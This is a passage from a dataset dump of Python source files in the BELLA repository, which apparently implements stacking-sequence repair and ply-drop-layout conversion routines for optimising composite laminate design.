elif np.allclose(outputs.ss_best, results.ss_tab[n_outer_step -1]) \\\r\n or outputs.obj_const < 1e-10:\r\n break\r\n\r\n # Repartitioning of the laminate into groups ?\r\n if (n_outer_step != parameters.n_outer_step - 1) \\\r\n and parameters.group_size_max[n_outer_step] \\\r\n != parameters.group_size_max[n_outer_step + 1]:\r\n\r\n # division of the laminates in groups of plies\r\n if constraints.sym:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_sym(parameters, targets, step=n_outer_step + 1)\r\n else:\r\n n_plies_in_groups, pos_first_ply_groups, n_groups = \\\r\n divide_laminate_asym(\r\n parameters, targets, step=n_outer_step + 1)\r\n\r\n mom_areas, cummul_mom_areas, group_mom_areas = calc_mom_of_areas(\r\n constraints, targets, ply_order, n_plies_in_groups)\r\n\r\n levels_in_groups = calc_levels(\r\n ply_order, n_plies_in_groups, n_groups)\r\n\r\n # Updating the table of assumptions for the next step\r\n lampam_assumed = np.zeros((n_groups, 12), float)\r\n for ind_group in range(n_groups):\r\n for ind_ply in range(n_plies_in_groups[ind_group]):\r\n lampam_assumed[ind_group] += delta_lampams[\r\n levels_in_groups[ind_group][ind_ply],\r\n constraints.ind_angles_dict[\r\n outputs.ss_best[\r\n levels_in_groups[ind_group][ind_ply]]]]\r\n\r\n if np.isnan(results.obj_tab).all():\r\n raise Exception('No successful repair during lay-up optimisation')\r\n return results\r\n\r\n ind_mini = np.nanargmin(results.obj_tab)\r\n results.number_of_outer_steps_performed = n_outer_step + 1\r\n results.n_outer_step_best_solution = ind_mini + 1\r\n results.objective = results.obj_tab[ind_mini]\r\n results.ss = results.ss_tab[ind_mini]\r\n results.lampam = results.lampam_tab_tab[ind_mini]\r\n results.completed = True\r\n\r\n return results"
},
{
"alpha_fraction": 0.5623105764389038,
"alphanum_fraction": 0.5692636966705322,
"avg_line_length": 40.816795349121094,
"blob_id": "9190341b54da1421eeda70f4f8ba314ae47db74c",
"content_id": "904939cabc708efd0cace4d3ea69d3fef680f748",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5609,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 131,
"path": "/src/RELAY/repair_reference_panel.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nRepair strategy for reference panel\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.BELLA.format_pdl import convert_ss_ref_to_reduced_sst\r\nfrom src.RELAY.repair_membrane import repair_membrane\r\nfrom src.RELAY.repair_flexural import repair_flexural\r\nfrom src.RELAY.repair_10_bal import repair_10_bal\r\nfrom src.RELAY.repair_10_bal import calc_mini_10\r\nfrom src.RELAY.repair_diso_contig import repair_diso_contig_list\r\nfrom src.guidelines.one_stack import check_lay_up_rules\r\n\r\n\r\ndef repair_reference_panel(\r\n multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0):\r\n \"\"\"\r\n repairs a reference stacking sequence to meet design and manufacturing\r\n guidelines\r\n\r\n The repair process is deterministic and attempts at conducting minimal\r\n modification of the original stacking sequence with a preference for\r\n modifying outer plies that have the least influence on out-of-plane\r\n properties.\r\n\r\n step 1: repair for the 10% rule and balance\r\n step 2: refinement for in-plane lamination parameter convergence\r\n step 3: repair for disorientation and contiguity\r\n step 4: refinement for out-of-plane lamination parameter convergence\r\n\r\n INPUTS\r\n\r\n - n_panels: number of panels in the entire structure\r\n - ss: stacking sequence of the laminate\r\n - multipanel: multipanel structure\r\n - constraints: instance of the class Constraints\r\n - parameters: instance of the class Parameters\r\n - obj_func_param: objective function parameters\r\n - reduced_pdl: reduced ply drop layout\r\n - mat: material properties\r\n \"\"\"\r\n# print_list_ss(reduced_pdl, 60)\r\n\r\n# weight_now = mat.density_area * np.array(\r\n# [outputs.ss[ind_panel].size \\\r\n# for ind_panel in range(multipanel.n_panels)])\r\n# penalty_weight_tab[outer_step] = (\r\n# weight_now - weight_ref) / weight_ref\r\n\r\n ind_ref = multipanel.reduced.ind_ref\r\n ss_ref = reduced_ss[ind_ref]\r\n lampam_target_ref = multipanel.reduced.panels[ind_ref].lampam_target\r\n\r\n mini_10 = calc_mini_10(constraints, ss_ref.size)\r\n #--------------------------------------------------------------------------\r\n # step 1 / repair for the 10% rule and balance\r\n #--------------------------------------------------------------------------\r\n ss_ref, ply_queue = repair_10_bal(ss_ref, mini_10, constraints)\r\n #--------------------------------------------------------------------------\r\n # step 2 / improvement of the in-plane lamination parameter convergence\r\n #--------------------------------------------------------------------------\r\n ss_ref_list, ply_queue_list, _ = repair_membrane(\r\n multipanel=multipanel,\r\n ss=ss_ref,\r\n ply_queue=ply_queue,\r\n mini_10=mini_10,\r\n in_plane_coeffs=multipanel.reduced.panels[ind_ref].lampam_weightingsA,\r\n parameters=parameters,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n lampam_target=lampam_target_ref)\r\n #--------------------------------------------------------------------------\r\n # step 3 / repair for disorientation and contiguity\r\n #--------------------------------------------------------------------------\r\n ss_ref, completed_inward, completed_outward, ind = repair_diso_contig_list(\r\n ss_ref_list, ply_queue_list, constraints,\r\n parameters.n_D1)\r\n if not completed_outward:\r\n\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl,\r\n ind_ref=multipanel.reduced.ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n return False, reduced_lampam, reduced_sst, reduced_ss\r\n #--------------------------------------------------------------------------\r\n #\r\n #--------------------------------------------------------------------------\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl, ind_ref=ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n #--------------------------------------------------------------------------\r\n # step 4 / improvement of the out-of-plane lamination parameter convergence\r\n #--------------------------------------------------------------------------\r\n ss_ref = repair_flexural(\r\n ss=ss_ref,\r\n lampam_target=lampam_target_ref,\r\n out_of_plane_coeffs=multipanel.reduced.panels[\r\n ind_ref].lampam_weightingsD,\r\n parameters=parameters,\r\n constraints=constraints,\r\n multipanel=multipanel)\r\n\r\n reduced_sst = convert_ss_ref_to_reduced_sst(\r\n ss_ref, reduced_pdl=reduced_pdl,\r\n ind_ref=multipanel.reduced.ind_ref,\r\n reduced_ss_before=reduced_ss)\r\n\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n reduced_lampam = calc_lampam(reduced_ss, constraints)\r\n\r\n check_lay_up_rules(ss_ref, constraints)\r\n\r\n if (reduced_ss[ind_ref] != ss_ref).any():\r\n print(ss_ref - reduced_ss[ind_ref])\r\n raise Exception(\"\"\"\r\nReference stacking sequence in reduced_ss different from ss_ref\"\"\")\r\n\r\n return True, reduced_lampam, reduced_sst, reduced_ss\r\n"
},
{
"alpha_fraction": 0.5617945790290833,
"alphanum_fraction": 0.5943475365638733,
"avg_line_length": 34.84879684448242,
"blob_id": "4791853759a3a67be082cce6cf81e8e3dd360d87",
"content_id": "ecc614ae24ff41493f4d0f3e9310273d95893a0b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10721,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 291,
"path": "/src/BELLA/format_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- convert_ss_to_sst\r\n produces a stacking sequence table from stacking sequences and a ply drop\r\n layout\r\n\r\n- convert_sst_to_ss\r\n produces a list of stacking sequences from a stacking sequence table\r\n\r\n- convert_ss_ref_to_reduced_sst\r\n retrieves a reduced stacking sequence table from a modified panel stacking\r\n sequence, a reduced ply drop layout scheme and the previous reduced\r\n stacking sequence list\r\n\r\n- convert_ss_guide_to_sst\r\n retrieves a stacking sequence table from a guide stacking sequence and the\r\n ply drop layout scheme\r\n\r\n- reduce_for_guide_based_blending\r\n returns smaller data structures for a structure with guide-based blending,\r\n either a reduced stacking sequence table, a reduced list of stacking\r\n sequences or a reduced ply drop layout\r\n\r\n- extend_after_guide_based_blending\r\n returns the complete stacking sequence table or the list of stacking\r\n sequences for a structure with guide-based blending\r\n\r\n- pos_in_ss_ref_to_pos_in_sst\r\n converts the positions of plies in the reference panel stacking sequence\r\n into ply positions related to the stacking sequence table\r\n\r\n- pos_in_sst_to_pos_in_panel, pos_in_sst_to_pos_in_panel_2\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef pos_in_ss_ref_to_pos_in_sst(pos_ref, pdl_ref):\r\n \"\"\"\r\n converts the positions of plies in the reference panel stacking sequence\r\n into ply positions related to the stacking sequence table\r\n\r\n INPUTS\r\n\r\n pos_ref: positions of the plies in the reference panel\r\n pdl_ref: line of the ply drop layout table corresponding to the reference\r\n panel\r\n \"\"\"\r\n if not len(pos_ref):\r\n return []\r\n # to order the positions\r\n ind_sort = np.argsort(pos_ref)\r\n pos_ref = np.copy(pos_ref)[ind_sort]\r\n pos_sst = np.array((), dtype='int16')\r\n counter_pos = 0\r\n counter = 0\r\n for ind_pdl_ply, pdl_ply in enumerate(pdl_ref):\r\n if pdl_ply != -1:\r\n counter += 1\r\n if counter == pos_ref[counter_pos]:\r\n pos_sst = np.hstack((pos_sst, ind_pdl_ply + 1))\r\n counter_pos += 1\r\n if counter_pos == pos_ref.size:\r\n break\r\n\r\n # to retrieve original order of the positions\r\n reorder = [np.where(ind_sort == ind)[0][0] for ind in range(pos_sst.size)]\r\n return pos_sst[reorder]\r\n\r\n\r\ndef pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel):\r\n \"\"\"\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\r\n INPUTS\r\n\r\n - pos_sst: ordered positions of the plies related to the stacking sequence\r\n table\r\n - pdl_panel: line of the ply drop layout table corresponding to the panel\r\n \"\"\"\r\n# print('pos_sst', pos_sst)\r\n# print('pdl_panel', pdl_panel)\r\n pos_panel = np.array((), dtype='int16')\r\n if not len(pos_sst):\r\n return pos_panel\r\n counter_pos_sst = 0\r\n counter_ply_panel = 0\r\n for ind_ply in range(0, pos_sst[-1]):\r\n# print('ind_ply', ind_ply)\r\n# print('counter_pos_sst', counter_pos_sst)\r\n# print('pos_sst[counter_pos_sst]', pos_sst[counter_pos_sst],\r\n# 'ind_ply + 1', ind_ply + 1)\r\n if pos_sst[counter_pos_sst] == ind_ply + 1:\r\n if pdl_panel[ind_ply] != -1:\r\n counter_ply_panel += 1\r\n pos_panel = np.hstack((pos_panel, counter_ply_panel))\r\n counter_pos_sst += 1\r\n else:\r\n if pdl_panel[ind_ply] != -1:\r\n counter_ply_panel += 1\r\n# print('pos_panel', pos_panel)\r\n return pos_panel\r\n\r\n\r\ndef pos_in_sst_to_pos_in_panel_2(pos_sst, pdl_panel):\r\n \"\"\"\r\n converts the positions of plies related to a stacking sequence table\r\n into ply positions in a specific panel stacking sequence\r\n\r\n This function is used for input ply positions not necessarily oredered,\r\n the output are either the ply positions in the panel, or 1e10 if the plies\r\n are not in the panel.\r\n\r\n INPUTS\r\n\r\n - pos_sst: positions of the plies related to the stacking sequence\r\n table\r\n - pdl_panel: line of the ply drop layout table corrsponding to the panel\r\n \"\"\"\r\n# print('pos_sst', pos_sst)\r\n# print('pdl_panel', pdl_panel)\r\n pos_panel = np.array((), dtype='int16')\r\n if not len(pos_sst):\r\n return pos_panel\r\n for input_ply_pos in pos_sst:\r\n if pdl_panel[input_ply_pos - 1] == -1:\r\n pos_panel = np.hstack((pos_panel, 1e10))\r\n else:\r\n pos_panel = np.hstack((pos_panel, len(\r\n list(filter(lambda x: (x != -1), pdl_panel[:input_ply_pos])))))\r\n return pos_panel\r\n\r\ndef convert_sst_to_ss(ss_tab):\r\n \"\"\"\r\n converts a stacking sequence table to a list of stacking sequences\r\n \"\"\"\r\n liste = []\r\n for ind_panel in range(len(ss_tab)):\r\n ss_new = np.array((), dtype=int)\r\n for ind_ply in range(ss_tab[ind_panel].size):\r\n if ss_tab[ind_panel][ind_ply] != -1:\r\n ss_new = np.hstack((ss_new, ss_tab[ind_panel][ind_ply]))\r\n liste.append(ss_new)\r\n return liste\r\n\r\n\r\ndef convert_ss_guide_to_sst(ss_guide, pdl):\r\n \"\"\"\r\n retrieves a stacking sequence table from a guide stacking sequence and the\r\n ply drop layout scheme\r\n \"\"\"\r\n sst = -np.ones((pdl.shape[0], pdl.shape[1]), dtype='int16')\r\n for ind in range(ss_guide.size):\r\n to_change = np.where(pdl[:, ind] != -1)[0]\r\n for elem in to_change:\r\n sst[elem][ind] = ss_guide[ind]\r\n return sst\r\n\r\ndef convert_ss_ref_to_reduced_sst(\r\n ss_ref, ind_ref, reduced_pdl, reduced_ss_before):\r\n \"\"\"\r\n retrieves a reduced stacking sequence table from a modified panel stacking\r\n sequence, a reduced ply drop layout scheme and the previous reduced\r\n stacking sequence list\r\n \"\"\"\r\n reduced_sst = convert_ss_to_sst(reduced_ss_before, reduced_pdl)\r\n ind_in_ss_ref = 0\r\n for ind_in_sst in range(reduced_sst.shape[1]):\r\n if reduced_sst[ind_ref, ind_in_sst] != -1:\r\n to_change = np.where(reduced_sst[:, ind_in_sst] != - 1)[0]\r\n for index in to_change:\r\n reduced_sst[index, ind_in_sst] = ss_ref[ind_in_ss_ref]\r\n ind_in_ss_ref += 1\r\n return reduced_sst\r\n\r\n\r\ndef convert_ss_to_sst(ss, pdl):\r\n \"\"\"\r\n retrieves a stacking sequence table from a list of stacking sequence and\r\n the ply drop layout scheme\r\n \"\"\"\r\n return convert_ss_guide_to_sst(ss[-1], pdl)\r\n\r\n\r\ndef reduce_for_guide_based_blending(multipanel, data):\r\n \"\"\"\r\n returns smaller data structures for a structure with guide-based blending,\r\n either a reduced stacking sequence table, a reduced list of stacking\r\n sequences or a reduced ply drop layout\r\n\r\n INPUTS\r\n - multipanel: multi-panel structure\r\n - data: data to be reduced\r\n \"\"\"\r\n if isinstance(data, list):\r\n return [data[multipanel.reduced.ind_for_reduc[ind]] \\\r\n for ind in range(multipanel.reduced.n_panels)]\r\n\r\n return np.array([data[multipanel.reduced.ind_for_reduc[ind]] \\\r\n for ind in range(multipanel.reduced.n_panels)])\r\n\r\n\r\ndef extend_after_guide_based_blending(multipanel, reduced_ss):\r\n \"\"\"\r\n returns the complete stacking sequence table or the list of stacking\r\n sequences for a structure with guide-based blending\r\n\r\n INPUTS\r\n - multipanel: multi-panel structure\r\n - reduced_ss: reduced laminate stacking sequences or stacking sequence\r\n table\r\n \"\"\"\r\n if isinstance(reduced_ss, list):\r\n return [reduced_ss[multipanel.reduced.ind_panels_guide[ind]] \\\r\n for ind in range(multipanel.n_panels)]\r\n return np.array([reduced_ss[multipanel.reduced.ind_panels_guide[ind]] \\\r\n for ind in range(multipanel.n_panels)])\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n*** Test for the function convert_ss_guide_to_sst ***')\r\n ss_guide = np.array([0, 45, 90, -45])\r\n pdl = np.array([[-1, 1, 2, -1], [0, 1, 2, 3]])\r\n print('SS_guide', ss_guide)\r\n print('pdl', pdl)\r\n print(convert_ss_guide_to_sst(ss_guide, pdl))\r\n\r\n print('\\n*** Test for the function convert_sst_to_ss ***')\r\n ss_tab = np.array([\r\n [45, 45, -45, -45, 0, -45, -45, 90, -45, 0, -45, 0, 0, 90],\r\n [45, 45, -45, -45, 0, -1, -45, -45, 90, -45, -45, 0, 0, 90],\r\n [45, 45, -45, -1, 0, -45, -1, -45, 90, -45, -45, 0, 0, 90]])\r\n print_list_ss(convert_sst_to_ss(ss_tab))\r\n\r\n print('\\n*** Test for the function pos_in_ss_ref_to_pos_in_sst ***')\r\n# pos_ref = [3, 5, 7]\r\n# reduced_pdl = np.array([\r\n# [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13],\r\n# [0, 1, -1, 3, -1, 5, -1, -1, 8, 9, 10, 11, 12, 13],\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]])\r\n# ind_ref = 1\r\n# expected_answer = [4, 9, 11]\r\n# print(pos_in_ss_ref_to_pos_in_sst(pos_ref, reduced_pdl[ind_ref]))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_ref = [7, 3, 5]\r\n# reduced_pdl = np.array([\r\n# [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13],\r\n# [0, 1, -1, 3, -1, 5, -1, -1, 8, 9, 10, 11, 12, 13],\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]])\r\n# ind_ref = 1\r\n# expected_answer = [11, 4, 9]\r\n# print(pos_in_ss_ref_to_pos_in_sst(pos_ref, reduced_pdl[ind_ref]))\r\n# print('expected_answer', expected_answer)\r\n\r\n print('\\n*** Test for the function pos_in_sst_to_pos_in_panel ***')\r\n# pos_sst = [4, 9, 11]\r\n# pdl_panel = [0, -1, -1, 3, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13]\r\n# expected_answer = [2, 5, 6]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_sst = [4, 9, 11]\r\n# pdl_panel = [0, -1, -1, -1, 4, 5, -1, -1, 8, -1, 10, 11, 12, 13]\r\n# expected_answer = [4, 5]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n# pos_sst = [2, 3, 4]\r\n# pdl_panel= [0, 1, 2, -1, -1, 5, 6, 7, 8, 9, -1, -1, 12, 13]\r\n# expected_answer = [2]\r\n# print(pos_in_sst_to_pos_in_panel(pos_sst, pdl_panel))\r\n# print('expected_answer', expected_answer)\r\n\r\n print('\\n*** Test for the function pos_in_sst_to_pos_in_panel_2 ***')\r\n pos_sst = [6, 5]\r\n pdl_panel= [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n expected_answer = [6, 5]\r\n print(pos_in_sst_to_pos_in_panel_2(pos_sst, pdl_panel))\r\n print('expected_answer', expected_answer)"
},
{
"alpha_fraction": 0.5025442242622375,
"alphanum_fraction": 0.5586816072463989,
"avg_line_length": 36.31572341918945,
"blob_id": "18a1ef61744cc2b3d11dfc183e9e3864d6732348",
"content_id": "90b1f7a665d896bfd613ba26e23bb8adccc45377",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 30461,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 795,
"path": "/src/RELAY/repair_10_bal.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nrepair for 10% rule and balance\r\n\r\n- repair_10_bal\r\n repairs a laminate regarding the 10% rule and balance\r\n\r\n- calc_mini_10:\r\n returns the minimum number of plies in the 0/90/+45/-45 directions to\r\n satisfy the 10% rule\r\n\r\n- calc_current_10_2:\r\n returns the current number of plies in the 0/90/+45/-45 directions\r\n\r\n- is_equal\r\n returns True if the set of partial stacking sequence + ply queue matches\r\n the initial stacking sequence\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\n\r\ndef repair_10_bal(ss_ini, mini_10, constraints):\r\n \"\"\"\r\n repairs a laminate regarding the 10% rule and balance\r\n \"\"\"\r\n if not (constraints.rule_10_percent and constraints.rule_10_Abdalla):\r\n ss, ply_queue = repair_10_bal_2(ss_ini, mini_10, constraints)\r\n return ss, ply_queue\r\n\r\n# print('initial')\r\n# print_ss(ss_ini)\r\n\r\n ## repair for balance\r\n mini_10 = calc_mini_10(constraints, ss_ini.size)\r\n ss, ply_queue = repair_10_bal_2(ss_ini, mini_10, constraints)\r\n\r\n ## repair for 10% rule\r\n if constraints.bal:\r\n ss, ply_queue = repair_10_Abdalla_ipo(ss, ply_queue, constraints)\r\n else:\r\n ss, ply_queue = repair_10_Abdalla_no_ipo(ss, ply_queue, constraints)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_Abdalla_ipo(ss, ply_queue, constraints):\r\n \"\"\"\r\n repairs a balanced laminate regarding the 10% rule of Abdalla\r\n\r\n INPUTS\r\n\r\n - ss: partially retrieved stacking sequence\r\n - ply_queue: queue of plies for innermost plies\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n dist_10 = calc_distance_Abdalla(lampamA, constraints)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints)\r\n\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_1(n_plies, constraints)\r\n\r\n dist_10_options = calc_dist_10_options_1(\r\n lampamA, lampamA_options, constraints)\r\n\r\n\r\n while dist_10 > 1e-10:\r\n# print('dist_10', dist_10)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n # attempts at modifying a couple of angled plies\r\n ind_pos_angle1, ind_pos_angle2 = np.unravel_index(\r\n np.argmin(dist_10_options, axis=None), dist_10_options.shape)\r\n angle1 = constraints.pos_angles[ind_pos_angle1]\r\n angle2 = constraints.pos_angles[ind_pos_angle2]\r\n# print('angle1', angle1, 'angle2', angle2)\r\n ind_angle1 = constraints.ind_angles_dict[angle1]\r\n ind_angle1_minus = constraints.ind_angles_dict[-angle1]\r\n ind_angle2 = constraints.ind_angles_dict[angle2]\r\n ind_angle2_minus = constraints.ind_angles_dict[-angle2]\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no couple of plies to be deleted\r\n if angle1 in [0, 90]:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 2:\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n else:\r\n # if no couple of plies to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1 \\\r\n or len(indices_per_angle[ind_angle1_minus]) < 1:\r\n dist_10_options[ind_pos_angle1, ind_pos_angle2] = 1e10\r\n continue\r\n\r\n# print('dist_10_options after clean', dist_10_options)\r\n# print('+-', angle1, ' plies changed into +-', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA += lampamA_options[ind_pos_angle2] - lampamA_options[\r\n ind_pos_angle1]\r\n dist_10 = dist_10_options[ind_pos_angle1, ind_pos_angle2]\r\n# print()\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n ind_ply_2 = indices_per_angle[ind_angle1_minus].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n# print('ind_ply_2', ind_ply_2)\r\n# print('ply_queue', ply_queue)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n if ind_ply_2 == 6666: # ply from the queue\r\n if angle1 == 90:\r\n ply_queue.remove(90)\r\n else:\r\n ply_queue.remove(-angle1)\r\n\r\n if angle2 == 90:\r\n ply_queue.append(90)\r\n else:\r\n ply_queue.append(-angle2)\r\n else:\r\n if angle2 != 90:\r\n ss[ind_ply_2] = -angle2\r\n else:\r\n ss[ind_ply_2] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_2 - 1] = ss[ind_ply_2]\r\n\r\n# lampamA_check = calc_lampamA_ply_queue(\r\n# ss, ss.size, ply_queue, constraints)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n indices_per_angle[ind_angle2_minus].append(ind_ply_2)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n indices_per_angle[ind_angle2_minus].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n sortAccording(indices_per_angle[ind_angle2_minus], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n indices_per_angle[ind_angle2_minus].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('dist_10', dist_10)\r\n if dist_10 < 1e-10:\r\n break\r\n\r\n dist_10_options = calc_dist_10_options_1(\r\n lampamA, lampamA_options, constraints)\r\n\r\n# print('dist_10', dist_10)\r\n\r\n # attempt at changing a 0 deg ply into a 90 deg ply\r\n ind_0 = np.where(constraints.pos_angles == 0)[0][0]\r\n ind_90 = np.where(constraints.pos_angles == 90)[0][0]\r\n\r\n if indices_per_angle[constraints.ind_angles_dict[0]]:\r\n\r\n dist_10_0_to_90 = calc_distance_Abdalla(\r\n lampamA + (lampamA_options[ind_90] - lampamA_options[ind_0])/2,\r\n constraints)\r\n# print('dist_10_0_to_90', dist_10_0_to_90)\r\n\r\n if dist_10_0_to_90 + 1e-20 < dist_10:\r\n# print('excess_10[0]', excess_10[0])\r\n# print('0 deg ply changed to 90 deg ply')\r\n dist_10 = dist_10_0_to_90\r\n lampamA += (lampamA_options[ind_90] - lampamA_options[ind_0])/2\r\n ind_ply_1 = indices_per_angle[constraints.index0].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(0)\r\n ply_queue.append(90)\r\n else:\r\n ss[ind_ply_1] = 90\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n return ss, ply_queue\r\n\r\n # attempt at changing a 90 deg ply into a 0 deg ply\r\n if indices_per_angle[constraints.ind_angles_dict[90]]:\r\n\r\n dist_10_90_to_0 = calc_distance_Abdalla(\r\n lampamA + (lampamA_options[ind_0] - lampamA_options[ind_90])/2,\r\n constraints)\r\n# print('dist_10_90_to_0', dist_10_90_to_0)\r\n\r\n if dist_10_90_to_0 + 1e-20 < dist_10:\r\n# print('90 deg ply changed to 0 deg ply')\r\n dist_10 = dist_10_90_to_0\r\n lampamA += (lampamA_options[ind_0] - lampamA_options[ind_90])/2\r\n ind_ply_1 = indices_per_angle[constraints.index90].pop(0)\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(90)\r\n ply_queue.append(0)\r\n else:\r\n ss[ind_ply_1] = 0\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n# print('lampamA', lampamA)\r\n# print('dist_10', dist_10)\r\n\r\n return ss, ply_queue\r\n\r\n\r\ndef repair_10_Abdalla_no_ipo(ss, ply_queue, constraints):\r\n \"\"\"\r\n repairs a non-balanced laminate regarding the 10% rule of Abdalla\r\n\r\n INPUTS\r\n\r\n - ss: partially retrieved stacking sequence\r\n - ply_queue: queue of plies for innermost plies\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss.size\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n dist_10 = calc_distance_Abdalla(lampamA, constraints)\r\n# print('dist_10', dist_10)\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n dist_10_options = calc_dist_10_options_3(\r\n lampamA, lampamA_options, constraints)\r\n# print('dist_10_options', dist_10_options)\r\n\r\n while dist_10 > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(dist_10_options, axis=None), dist_10_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 